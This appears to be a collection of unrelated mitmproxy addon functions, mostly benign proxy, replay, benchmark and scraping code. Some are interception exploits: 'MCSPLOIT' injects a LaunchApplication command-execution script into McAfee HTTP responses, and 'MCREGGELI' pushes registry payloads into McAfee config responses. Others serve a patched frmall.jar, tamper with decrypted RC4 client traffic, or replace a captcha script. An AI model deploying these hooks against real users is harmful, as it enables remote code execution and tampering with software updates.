def tls_clienthello(self, data: tls.ClientHelloData): server_address = data.context.server.peername if not self.strategy.should_intercept(server_address): ctx.log( f"TLS passthrough: {human.format_address(server_address)}.") data.ignore_connection = True self.strategy.record_skipped(server_address)
def save_flows_content(path: pathlib.Path, flows: typing.Iterable[flow.Flow]) -> None: for f in flows: for m in ('request', 'response'): message = getattr(f, m) message_path = path / "flows" / f.id / m os.makedirs(str(message_path / "content"), exist_ok=True) with open(str(message_path / 'content.data'), 'wb') as content_file: # don't use raw_content here as this is served with a default content type if message: content_file.write(message.content) else: content_file.write(b'No content.') # content_view t = time.time() if message: description, lines, error = contentviews.get_message_content_view( 'Auto', message, f) else: description, lines = 'No content.', [] if time.time() - t > 0.1: ctx.log( "Slow content view: {} took {}s".format( description.strip(), round(time.time() - t, 1)), "info") with open(str(message_path / "content" / "Auto.json"), "w") as content_view_file: json.dump(dict(lines=list(lines), description=description), content_view_file)
def _handle_event(self, event: events.Event) -> CommandGenerator[None]: if isinstance(event, events.Start): content = self.flow.request.raw_content self.flow.request.timestamp_start = self.flow.request.timestamp_end = time.time( ) yield layers.http.ReceiveHttp( layers.http.RequestHeaders( 1, self.flow.request, end_stream=not content, replay_flow=self.flow, )) if content: yield layers.http.ReceiveHttp( layers.http.RequestData(1, content)) yield layers.http.ReceiveHttp(layers.http.RequestEndOfMessage(1)) elif isinstance(event, ( layers.http.ResponseHeaders, layers.http.ResponseData, layers.http.ResponseEndOfMessage, layers.http.ResponseProtocolError, )): pass else: # pragma: no cover ctx.log(f"Unexpected event during replay: {events}")
def get_mock(self, flow: http.HTTPFlow): service = flow.request.path.split('/')[1] raw_url = flow.request.path.split('?')[0] raw_url = raw_url.split('/') raw_url.pop(0) raw_url.pop(0) method = '/'.join(map(str, raw_url)) params = {} for key in flow.request.query: params[key] = flow.request.query[key] for key in flow.request.urlencoded_form: params[key] = flow.request.urlencoded_form[key] mock = get_matched_config(service, flow.request.method, method, params, self.configs) if mock: ctx.log("[mocking][{}] {}".format(self.key, method)) flow.response.text = json.dumps(mock["response"]) flow.response.status_code = mock["status"]
def save_flows_content(path: pathlib.Path, flows: typing.Iterable[flow.Flow]) -> None: for f in flows: for m in ('request', 'response'): message = getattr(f, m) message_path = path / "flows" / f.id / m os.makedirs(str(message_path / "content"), exist_ok=True) with open(str(message_path / 'content.data'), 'wb') as content_file: # don't use raw_content here as this is served with a default content type if message: content_file.write(message.content) else: content_file.write(b'No content.') # content_view t = time.time() if message: description, lines, error = contentviews.get_message_content_view( 'Auto', message ) else: description, lines = 'No content.', [] if time.time() - t > 0.1: ctx.log( "Slow content view: {} took {}s".format( description.strip(), round(time.time() - t, 1) ), "info" ) with open(str(message_path / "content" / "Auto.json"), "w") as content_view_file: json.dump( dict(lines=list(lines), description=description), content_view_file )
def response(self, flow): if b"GDay" in flow.request.content: self.mate = struct.unpack(">I", flow.response.content[4:8])[0] ctx.log.info("Found Mate %08X" % self.mate) self.key[0] = (self.gday >> 8) & 0xff self.key[1] = (self.mate >> 4) & 0xff self.key[2] = 0xae self.key[3] = (self.gday >> 16) & 0xff self.key[4] = (self.mate >> 12) & 0xff self.rc4_req = RC4() self.rc4_req.setKey(self.key) self.rc4_resp = RC4() self.rc4_resp.setKey(self.key) ctx.log("RC4 initialized with key: %s" % ''.join("%02X" % a for a in self.key)) # Noble the handshake flow.response.replace("Mate", "Matf") return if self.key[0] is not None \ and "lservlet" in flow.request.url \ and flow.response.headers['content-type'] == "application/octet-stream": with self.resp_lock: flow.response.content = self.rc4_resp.decrypt([c for c in flow.response.content]) if not flow.response.content.endswith(b"\xf0\x01"): ctx.log.error("[!] Invalid response message?") ctx.log.debug("RESPONSE:\n %s" % binascii.hexlify(flow.response.content))
def request(self, flow): if (self.pragma is not None) and ("lservlet" in flow.request.url) and ("pragma" in flow.request.headers): try: p = int(flow.request.headers["pragma"]) if abs(p) > self.pragma: self.pragma = abs(p) else: self.pragma += 1 if p >= 0: flow.request.headers["pragma"] = str(self.pragma) else: flow.request.headers["pragma"] = str(self.pragma * -1) ctx.log("[!] Set Pragma to %d" % self.pragma) except ValueError: pass if flow.request.content[0:4] == b"GDay": self.key = [None] * 5 self.mate = None self.rc4_req = None self.rc4_resp = None self.gday = struct.unpack(">I", flow.request.content[4:8])[0] self.pragma = 1 ctx.log.info("Found GDay %08X" % self.gday) return if self.key[0] is not None and "lservlet" in flow.request.url: ctx.log.debug("REQUEST:\n %s" % binascii.hexlify(flow.request.content)) if len(flow.request.content) == 0: ctx.log.warn("[!] Empty message") return if not flow.request.content.endswith(b"\xf0\x01"): ctx.log.error("[!] Invalid request message?") with self.req_lock: flow.request.content = bytes(self.rc4_req.encrypt(flow.request.content))
def deal_data(url, text, selector): ''' 处理响应结果 :return: ''' if 'ArticleTitle' in text and 't20131029_1012002' not in url: redis_db.sadd(content_key, text) ctx.log('详情内容获取成功, 已缓存至redis!')
def deal_data(url, text, selector): ''' 处理响应结果 :return: ''' if 'ArticleTitle' in text: redis_db.sadd(content_key, text) ctx.log('详情内容获取成功, 已缓存至redis!')
def request(flow: http.HTTPFlow) -> None: ctx.log(flow.request.pretty_host) if flow.request.pretty_host.endswith("picobrew.com"): ctx.log(flow.request.path) flow.request.host = picobrew_server['host'] flow.request.port = picobrew_server['port'] flow.request.scheme = picobrew_server['scheme'] flow.request.headers['Host'] = picobrew_server['host']
def response(flow: mitmproxy.http.HTTPFlow): if flow.request.url.find( "https://static.geetest.com/static/js/slide.7.7.4.js") > -1: ctx.log("replace slide.7.7.4.js") with open("./statics/bin/ddd_mogujie_geetest.js", "r", encoding="utf8") as fp: js = fp.read() flow.response.set_text(js)
async def stats(self): while True: await asyncio.sleep(1.0) if self._flushes >= self._target: self._log(f"AVG : {mean(self.results)}") ctx.log(f"<== Benchmark Ended. Shutting down... ==>") if self.out: self.out.close() self.temp.close() ctx.master.shutdown()
def request(flow): if ctx.options.partial_url in flow.request.pretty_url: original_url = flow.request.pretty_url print("Matched URL for redirect: '{}'".format(original_url)) ctx.log(flow.request.path) parsed_new_url = urlparse(ctx.options.new_url) flow.request.host = parsed_new_url.netloc flow.request.path = parsed_new_url.path flow.request.headers["Host"] = parsed_new_url.netloc print("Redirected url '{}' to '{}'.\n".format(original_url, ctx.options.new_url))
def response(self, flow): if flow.request.is_replay: self._flow.response = flow.response self._flow.resume() return if flow.response.status_code == 401: self.refresh_token, self.auth_token = ot.refresh_token(self.refresh_token) ctx.log("refreshed authorization Bearer token") flow2 = flow.copy() ctx.master.commands.call("replay.client", [flow2]) flow.intercept() self._flow = flow
async def playback(self): while True: self.inflight = await self.queue.get() try: h = ReplayHandler(self.inflight, self.options) await h.replay() except Exception: ctx.log( f"Client replay has crashed!\n{traceback.format_exc()}", "error") self.queue.task_done() self.inflight = None
def article_content(self, flow: http.HTTPFlow) -> None: """ 提取文章内容 :param flow: http流 """ text = flow.response.text request_url = flow.request.url """if len(self.sn_list) == 0: biz = re.search(r'__biz=([a-zA-Z0-9|=]+)', request_url).group(1) self.sn_list = self._data_service.get_blank_msg(biz) self.sn_p = -1 weixin_id = re.search(r'<span class="profile_meta_value">(.*?)</span>', text).group(1) account = self._data_service.get_account(biz) account.weixin_id = weixin_id account.updated_time = datetime.datetime.now() self._data_service.save_account(account) else:""" # 取出文章并更新内容 """content = "" for t in re.findall(r'<p(.*?)>(.*?)</p>', text): line = self._remove_escapes(t[1]) if re.match(r'<br(.*?)>', line) is not None: line = '\n' elif re.match(r'<img(.*?)/>', line) is not None: line = re.search(r'data-src="(.*?)" ', line).group(1) + '\n' else: line = re.sub(r'<(.*?)>', '', line) + '\n' content += line msg: Msg = self._data_service.get_msg(self.sn_list[self.sn_p]) msg.content = content msg.updated_time = datetime.datetime.now() self._put_msg(msg) self.sn_p += 1""" if self.msg is not None: content = Content() content.msg_id = self.msg.id ctx.log(str(self.msg.id)) content.content = str(text) content.crawled_time = datetime.datetime.now().strftime( "%Y-%m-%d %H:%M:%S") self._data_service.save_content(content) # 如果还有等待抓取的文章,则设置下一跳的js #if self.sn_p < len(self.sn_list): #msg: Msg = self._data_service.get_msg(self.sn_list[self.sn_p]) self.msg = self._data_service.get_uncrawled_link() next_link = self.msg.msg_link delay_time = int(random.random() * 2 + 1) insert_meta = '<meta http-equiv="refresh" content="' + str( delay_time) + ';url=' + next_link + '" />' text = text.replace('</title>', '</title>' + insert_meta) flow.response.set_text(text)
async def playback(self): while True: self.inflight = await self.queue.get() try: h = ReplayHandler(self.inflight, self.options) if ctx.options.client_replay_concurrency == -1: asyncio_utils.create_task(h.replay(), name="client playback awaiting response") else: await h.replay() except Exception: ctx.log(f"Client replay has crashed!\n{traceback.format_exc()}", "error") self.queue.task_done() self.inflight = None
def _handle_hidden_redirect(context, flow, original_host): """ если указано что какой-то хост нужно тихо перевести на другой хост можно просто поменять параметры в флоу """ redirect_host = context.get_redirect(original_host) if redirect_host: ctx.log("[spoofing][{}] redirect {} to {}".format( context.key, original_host, redirect_host)) flow.request.host = redirect_host flow.request.port = 80 flow.request.scheme = 'http' flow.request.headers["Host"] = redirect_host
def load(l): global rules blocklists = glob("easylists/*") if len(blocklists) == 0: ctx.log("Error, no blocklists found in 'easylists/'. Please run the 'update-blocklists' script.") raise SystemExit else: ctx.log("* Loading adblock rules...") for list in blocklists: ctx.log(" |_ %s" % list) rules = load_rules(blocklists) ctx.log("") ctx.log("* Done! Proxy server is ready to go!")
def next_layer(nextlayer: layer.NextLayer): ctx.log(f"{nextlayer.context=}\n" f"{nextlayer.data_client()[:70]=}\n" f"{nextlayer.data_server()[:70]=}\n") if nextlayer.context.server.address == ("example.com", 443): nextlayer.context.server.address = ("example.com", 80) # We are disabling ALPN negotiation as our curl client would otherwise agree on HTTP/2, # which our example server here does not accept for plaintext connections. nextlayer.context.client.alpn = b"" # We know all layers that come next: First negotiate TLS with the client, then do simple TCP passthrough. # Setting only one layer here would also work, in that case next_layer would be called again after TLS establishment. nextlayer.layer = layers.ClientTLSLayer(nextlayer.context) nextlayer.layer.child_layer = layers.TCPLayer(nextlayer.context)
def response(self, flow: http.HTTPFlow): if flowfilter.match(self.http_code_ok, flow): """只有 200 状态进入""" ctx.log('code %s' % flow.response.status_code) """匹配目标网址""" if flowfilter.match(self.MOVIE_path, flow): if flow.response.content: pretty_path = str(flow.request.path.rstrip()) pretty_path = pretty_path.replace('/', '_') \ .replace(':', '_') \ .replace('&', '_') pretty_path = pretty_path[:250] + '.json' res_content = flow.response.content.decode('utf-8') path = os.path.join(self.folder_path, pretty_path) with open(path, 'w+', encoding='utf-8') as f: f.write(str(res_content) + '\n') print("保存成功")
def response(flow): if flow.request.scheme == "http" and "mscconfig.asp" in flow.request.url: try: oxml = etree.XML(flow.response.content) oxml.set("frequency", "1") update = oxml.xpath("//webservice-response/update")[0] for r in REG: reg = etree.SubElement(update, "reg") reg.set("key", r["key"]) reg.set("type", r["type"]) reg.set("obfuscate", "0") reg.set("name", r["name"]) reg.set("value", r["value"]) #ctx.log(etree.tostring(oxml)) flow.response.content = etree.tostring(oxml) ctx.log("[+] [MCREGGELI] Payload sent") except etree.XMLSyntaxError: ctx.log("[-] [MCREGGELI] XML deserialization error")
def cach_task(url, text, selector): ''' 缓存任务 :return: ''' # 分页任务缓存 page_count = re.findall(r"createPageHTML\((\d+)", text, re.S) if page_count and 'index_' not in url: url_list = [] for page in range(1, int(page_count[0])): url_list.append(urljoin(url, 'index_{}.shtml'.format(page))) redis_db.sadd(catlog_key, url_list) ctx.log('缓存 catlog_page_list 成功!') # 详情任务缓存 detail_url_list = selector.css('.lsj-list li a::attr(href)').extract() if detail_url_list: redis_db.sadd(detail_key, detail_url_list) ctx.log('缓存 detail_url_list 成功!')
def next_layer(next_layer): """ This hook does the actual magic - if the next layer is planned to be a TLS layer, we check if we want to enter pass-through mode instead. """ if isinstance(next_layer, TlsLayer) and next_layer._client_tls: server_address = next_layer.server_conn.address if tls_strategy.should_intercept(server_address): # We try to intercept. # Monkey-Patch the layer to get feedback from the TLSLayer if interception worked. ctx.log('aaaa') next_layer.__class__ = TlsFeedback else: # We don't intercept - reply with a pass-through layer and add a "skipped" entry. mitmproxy.ctx.log("TLS passthrough for %s" % repr(next_layer.server_conn.address), "info") next_layer_replacement = RawTCPLayer(next_layer.ctx, ignore=True) next_layer.reply.send(next_layer_replacement) tls_strategy.record_skipped(server_address)
def save_content(self, content: Content): #ctx.log(content.msg_id) ctx.log(content.crawled_time) cursor = self.db.cursor() pymysql.escape_string("'") sql1 = "INSERT INTO content(msg_id, content, crawled_time) VALUES ('%d', \'%s\', '%s')" % ( content.msg_id, pymysql.escape_string( content.content), content.crawled_time) sql2 = "UPDATE tmp_uncrawled_articles SET content_gotten = 1 WHERE id = '%d'" % content.msg_id try: # 执行SQL语句 cursor.execute(sql1) cursor.execute(sql2) # 提交到数据库执行 self.db.commit() except Exception as e: # 发生错误时回滚 self.db.rollback() ctx.log(str(e))
async def writer(self): while True: await asyncio.sleep(self._flush_period) count = 1 f = await self.queue.get() self.hot_flows.append(f) while count < self._flush_rate: try: self.hot_flows.append(self.queue.get_nowait()) count += 1 except asyncio.QueueEmpty: pass start = time.perf_counter() n = self._fflush() end = time.perf_counter() self._log(f"dumps/time ratio: {n} / {end-start} -> {n/(end-start)}") self.results.append(n / (end - start)) self._flushes += n self._log(f"Flows dumped: {self._flushes}") ctx.log(f"Progress: {min(100.0, 100.0 * (self._flushes / self._target))}%")
def response(flow): if flow.request.scheme == "http" and ( flow.request.headers['host'].endswith("mcafee.com") or "mcafee" in flow.request.url): if flow.response.status_code == 302: ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (HTML)") https_url = flow.request.url.replace("http://", "https://") r = requests.get(https_url, headers=flow.request.headers, verify=False) if "text/html" not in r.headers['content-type']: return contents = r.text contents = contents.replace( "</head>", "<script>try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}</script></head>" % (COMMAND, CMDARGS)) flow.response = http.HTTPResponse.make( 200, bytes(contents, encoding="utf-8"), { "Content-Type": "text/html; charset=utf-8", "Expires": "-1" }) return try: if flow.response.headers["content-type"] == "text/javascript": ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (JS)") inject = "try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}\n" % ( COMMAND, CMDARGS) try: flow.response.contents = inject + flow.response.contents except AttributeError: ctx.log( "[-] [MCSPLOIT] No content in the original response!") pass except KeyError: pass
async def writer(self): while True: await asyncio.sleep(self._flush_period) count = 1 f = await self.queue.get() self.hot_flows.append(f) while count < self._flush_rate: try: self.hot_flows.append(self.queue.get_nowait()) count += 1 except asyncio.QueueEmpty: pass start = time.perf_counter() n = self._fflush() end = time.perf_counter() self._log( f"dumps/time ratio: {n} / {end-start} -> {n/(end-start)}") self.results.append(n / (end - start)) self._flushes += n self._log(f"Flows dumped: {self._flushes}") ctx.log( f"Progress: {min(100.0, 100.0 * (self._flushes / self._target))}%" )
def response(self, flow): if "frmall.jar" in flow.request.url: ctx.log("Serving patched frmall.jar") patched = open("/tmp/frmall.jar", "rb").read() flow.response.content = patched flow.response.headers["content-length"] = str(len(patched)) flow.response.status_code = 200 return if b"GDay" in flow.request.content: self.mate = struct.unpack(">I", flow.response.content[4:8])[0] ctx.log("Found Mate %s" % repr(flow.response.raw_content)) #Found GDay! be862007 #Found Mate! 000055f0 #RC4 Key: 205fae8605 self.key[0] = (self.gday >> 8) & 0xff self.key[1] = (self.mate >> 4) & 0xff self.key[2] = 0xae self.key[3] = (self.gday >> 16) & 0xff self.key[4] = (self.mate >> 12) & 0xff self.rc4_req = RC4() self.rc4_req.setKey(self.key) self.rc4_resp = RC4() self.rc4_resp.setKey(self.key) ctx.log("RC4 initialized with key: %s" % (repr(self.key))) return if self.key[0] != None and "lservlet" in flow.request.url: with self.resp_lock: flow.response.content = self.rc4_resp.decrypt( [c for c in flow.response.content]) if not flow.response.content.endswith(b"\xf0\x01"): ctx.log("[!] Invalid response message?") ctx.log("RESPONSE:\n %s" % binascii.hexlify(flow.response.content))
def running(self): if not self.streaming: ctx.log("<== Serialization Benchmark Enabled ==>") self.tf = tflow.tflow() self.tf.request.content = b'A' * ctx.options.testflow_size ctx.log(f"With content size: {len(self.tf.request.content)} B") if ctx.options.benchmark_save_path: ctx.log(f"Storing results to {ctx.options.benchmark_save_path}") self.out = open(ctx.options.benchmark_save_path, "w") self.dbh = db.DBHandler(self.temp.name, mode='write') self.streaming = True tasks = (self.stream, self.writer, self.stats) self.loop.create_task(asyncio.gather(*(t() for t in tasks)))
def running(self): if not self.streaming: ctx.log("<== Serialization Benchmark Enabled ==>") self.tf = tflow.tflow() self.tf.request.content = b'A' * ctx.options.testflow_size ctx.log(f"With content size: {len(self.tf.request.content)} B") if ctx.options.benchmark_save_path: ctx.log( f"Storing results to {ctx.options.benchmark_save_path}") self.out = open(ctx.options.benchmark_save_path, "w") self.dbh = db.DBHandler(self.temp.name, mode='write') self.streaming = True tasks = (self.stream, self.writer, self.stats) self.loop.create_task(asyncio.gather(*(t() for t in tasks)))
def request(self, flow): flow.request.http_version = "HTTP/1.0" # Workaround for MitMproxy bug #1721 if flow.request.content[0:4] == b"GDay": self.key = [None] * 5 self.mate = None self.rc4_req = None self.rc4_resp = None self.gday = struct.unpack(">I", flow.request.content[4:8])[0] ctx.log("Found GDay %X" % self.gday) return if self.key[0] != None and "lservlet" in flow.request.url: ctx.log("REQUEST:\n %s" % binascii.hexlify(flow.request.content)) if not flow.request.content.endswith(b"\xf0\x01"): ctx.log("[!] Invalid request message?") with self.req_lock: flow.request.content = bytes( self.rc4_req.encrypt(flow.request.content))
def done(): if not hasattr(context, "HARLog"): return """ Called once on script shutdown, after any other events. """ from pprint import pprint import json json_dump = context.HARLog.json(log=True) compressed_json_dump = context.HARLog.compress() if context.dump_file == '-': context.log(pprint.pformat(json.loads(json_dump))) elif context.dump_file.endswith('.zhar'): file(context.dump_file, "w").write(compressed_json_dump) else: file(context.dump_file, "w").write(json_dump) context.log("HAR log finished with %s bytes (%s bytes compressed)" % (len(json_dump), len(compressed_json_dump))) context.log("Compression rate is %s%%" % str(100. * len(compressed_json_dump) / len(json_dump)))
def response(self, flow): if not ctx.options.corrupt_handshake and "frmall.jar" in flow.request.url: ctx.log("Serving patched frmall.jar") patched=open("/tmp/frmall.jar","rb").read() flow.response.content=patched flow.response.headers["content-length"] = str(len(patched)) flow.response.status_code=200 return if b"GDay" in flow.request.content: self.mate=struct.unpack(">I",flow.response.content[4:8])[0] ctx.log("Found Mate %s" % repr(flow.response.raw_content)) #Found GDay! be862007 #Found Mate! 000055f0 #RC4 Key: 205fae8605 self.key[0]=(self.gday >> 8) & 0xff self.key[1]=(self.mate >> 4) & 0xff self.key[2]=0xae self.key[3]=(self.gday >> 16) & 0xff self.key[4]=(self.mate >> 12) & 0xff self.rc4_req=RC4() self.rc4_req.setKey(self.key) self.rc4_resp=RC4() self.rc4_resp.setKey(self.key) ctx.log("RC4 initialized with key: %s" % (repr(self.key))) if ctx.options.corrupt_handshake: flow.response.replace("Mate", "Matf") return if b"ifError:11/" in flow.response.content: with self.resp_lock: with self.req_lock: # We don't want any inteference with other requests wait=int(flow.response.content.split(b"/")[1]) headers=flow.request.headers self.pragema=abs(self.pragma) # making sure Pragma is not negative while True: self.total_wait += wait if ctx.options.max_wait >= 0 and self.total_wait > ctx.options.max_wait: break ctx.log("[!] Handling ifError:11 - %d ms timeout" % wait) time.sleep(wait / 1000.0) self.pragma += 1 headers["Pragma"] = "%d" % (-1*self.pragma) headers["Content-Length"] = "0" r=requests.post(flow.request.url, headers=headers, data=None) if r.headers['content-type'] == "text/plain": wait=int(r.content.split(b"/")[1]) else: flow.response.content=self.rc4_resp.decrypt([c for c in r.content]) flow.response.headers["Content-Type"]="application/octet-stream" flow.response.headers["Content-Length"]=str(len(flow.response.content)) self.total_wait = 0 ctx.log("[+] Timeout handled") break return # Response already decrypted, we can return now if self.key[0]!=None and "lservlet" in flow.request.url and flow.response.headers['content-type']=="application/octet-stream": with self.resp_lock: self.total_wait = 0 flow.response.content=self.rc4_resp.decrypt([c for c in flow.response.content]) if not flow.response.content.endswith(b"\xf0\x01"): ctx.log("[!] Invalid response message?") ctx.log("RESPONSE:\n %s" % binascii.hexlify(flow.response.content))
def request(self, flow): ctx.log("Max wait: %d" % ctx.options.max_wait) #flow.request.http_version="HTTP/1.0" # Workaround for MitMproxy bug #1721 if (self.pragma!=None) and ("lservlet" in flow.request.url) and ("pragma" in flow.request.headers): try: p=int(flow.request.headers["pragma"]) if abs(p)>self.pragma: self.pragma=abs(p) else: self.pragma+=1 if p>=0: flow.request.headers["pragma"]=str(self.pragma) else: flow.request.headers["pragma"]=str(self.pragma*-1) ctx.log("[!] Set Pragma to %d" % self.pragma) except ValueError: pass if flow.request.content[0:4]==b"GDay": self.key=[None]*5 self.mate=None self.rc4_req=None self.rc4_resp=None self.gday=struct.unpack(">I",flow.request.content[4:8])[0] self.pragma=1 ctx.log("Found GDay %X" % self.gday) return if self.key[0]!=None and "lservlet" in flow.request.url: ctx.log("REQUEST:\n %s" % binascii.hexlify(flow.request.content)) if len(flow.request.content)==0: ctx.log("[!] Empty message") return if not flow.request.content.endswith(b"\xf0\x01"): ctx.log("[!] Invalid request message?") with self.req_lock: flow.request.content=bytes(self.rc4_req.encrypt(flow.request.content))
def _log(self, msg): if self.out: self.out.write(msg + '\n') else: ctx.log(msg)